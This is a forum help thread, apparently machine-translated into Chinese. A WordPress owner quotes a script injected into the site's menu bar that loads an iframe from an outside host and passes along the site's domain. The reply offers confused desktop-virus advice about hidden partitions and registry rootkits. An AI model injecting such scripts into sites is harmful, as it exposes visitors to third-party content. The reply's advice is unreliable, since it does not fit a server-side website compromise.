你好,我的网站上有一个恶意脚本,我在任何地方都找不到!
我检查了检查员,它返回了这个:
<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div>
<div id="abrir_aba"></div>
<div class="handle"></div>
<script type="text/javascript">
var relatedUrl = document.domain;
var protocol = window.location.protocol;
var idadv = document.createElement("iframe");
with(idadv){
id = "idadv";
src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl;
scrolling = "no";
}
document.getElementById("menu-bar").appendChild(idadv);
</script>
<script type="text/javascript">
$("#menu-bar").slideReveal({
trigger: $(".handle"),
push: false,
position: "right",
width: 50,
show: function(slider, trigger){
$('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"});
},
hidden: function(slider, trigger){
$('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"});
},
});
</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url=www.websiteladies.com" scrolling="no"></iframe></div>
它位于我的wordpress的"菜单栏"中,但我在任何地方都找不到任何东西!因此,我的网站的SSL证书显示我的网站对我的客户不安全!我简直不敢相信!
以下是URL:http://www.websiteladies.com
有什么帮助吗?
我自己也遇到过这个问题,可能需要几个小时才能解决。
它将采用JavaScript、jQuery格式或VBS格式,至少部分是这样。它可能在HDD或外部USB的顶端创建了自己的分区,所以请检查您的分区
它会将自己的一部分附加到注册表中,这样它就知道你何时搜索它,并且只要你在线,它就可以自我修复。它可以作为一个根工具包开始,将自己附加到文本或照片文件中
请尝试下载Spybot SD,然后脱机安装并运行该程序。如果病毒创建了它自己的分区,你必须找到它,并对该分区进行完全擦除,然后将其设置为之前分区的扩展。快速"快速清理"不起作用,因为它只清理扇区标记
据我所知,没有任何防病毒或spybot跟踪器会在隐藏分区中查找,但他们可以清理注册表并找到隐藏的rootkit
试着记住您最近下载和安装的内容
检查已插入的USB拇指驱动器。
我建议你保持离线状态,直到你确信病毒的所有成分都消失了。我有一个在防病毒程序中隐藏了一些组件。